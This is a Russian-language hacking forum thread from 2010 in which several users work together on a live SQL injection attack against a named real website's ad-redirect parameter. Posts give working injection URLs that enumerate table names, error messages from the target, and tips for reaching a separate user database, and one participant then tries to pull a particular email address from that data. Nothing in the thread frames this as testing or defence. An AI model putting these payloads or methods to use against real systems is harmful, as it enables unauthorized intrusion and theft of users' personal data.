ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13381  
Старый 23.05.2010, 22:26
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от Konqi  
+where+table_schema=
если бы where помогло не писал бы тут((

вот
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables+wh ere+table_schema='SH_users')--

ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/adredirect.asp, line 25
 
Ответить с цитированием

  #13382  
Старый 23.05.2010, 22:30
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от YuNi|[c  
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb
Код HTML:
group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'
Код HTML:
group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'+and+table_name>'здесь имя последней таблицы, которая вывелась в первом запросе'
Либо
Код HTML:
group_concat(table_name)+from+infor  mation_schema.tables+limit+0,1
и поочередно меняешь limit 0,1 limit 1,1 limit 2,1 и тд.

Последний раз редактировалось Redwood; 23.05.2010 в 22:35..
 
Ответить с цитированием

  #13383  
Старый 23.05.2010, 22:36
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от Redwood  
Код HTML:
group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'
Код HTML:
group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'+and+table_name>'сдесь имя последней таблицы, которая вывелась в первом запросе'
Либо
Код HTML:
group_concat(table_name)+from+infor  mation_schema.tables+limit+0,1
и поочередно меняешь limit 0,1 limit 1,1 limit 2,1 и тд.
хмм. вроде ругается
Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name.
/adredirect.asp, line 23

я уже знаю имена всех бд, но нужные бд не текуший
 
Ответить с цитированием

  #13384  
Старый 23.05.2010, 22:38
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

+where+table_schema+not+in+('information_schema')


а так?
 
Ответить с цитированием

  #13385  
Старый 23.05.2010, 22:43
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от YuNi|[c  
Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name.
/adredirect.asp, line 23
А, ну так это MSSQL, ясное дело будет ругаться на group_concat

Последний раз редактировалось Redwood; 23.05.2010 в 23:05..
 
Ответить с цитированием

  #13386  
Старый 23.05.2010, 22:43
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от Konqi  
+where+table_schema+not+in+('information_schema')


а так?
спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)
 
Ответить с цитированием

  #13387  
Старый 23.05.2010, 22:47
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от YuNi|[c  
спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)

ну не будь ленивым,иди дальше и будет твой бд
 
Ответить с цитированием

  #13388  
Старый 23.05.2010, 22:52
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от YuNi|[c  
спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)
упс , вернее так:
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27%29%29--

далее
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27,%27MSmerge_log_files% 27%29%29--

и т.д

В mssql есть база данных в которой хранится информация о всех таблицах и колонках во всех бд данного сервера

статьи читать надо.

Последний раз редактировалось Strilo4ka; 23.05.2010 в 22:57..
 
Ответить с цитированием

  #13389  
Старый 23.05.2010, 23:41
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от Strilo4ka  
упс , вернее так:
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27%29%29--

далее
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20 where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514 492E34962820230F0E51BEE26%27,%27MSmerge_log_files% 27%29%29--

и т.д

В mssql есть база данных в которой хранится информация о всех таблицах и колонках во всех бд данного сервера

статьи читать надо.
ну статьи то читаю просто этот фильтр меня немного перепутал
 
Ответить с цитированием

  #13390  
Старый 24.05.2010, 13:56
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от YuNi|[c  
ну статьи то читаю просто этот фильтр меня немного перепутал
тут какая то неполадка. Я регал мейл kvadimex но не могу найти в базе этот мейл((. Подскажите как делать запрос тут. like '%email%' прошло в поиске таблицы с мейлом но like '%kvadimex%' не работает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ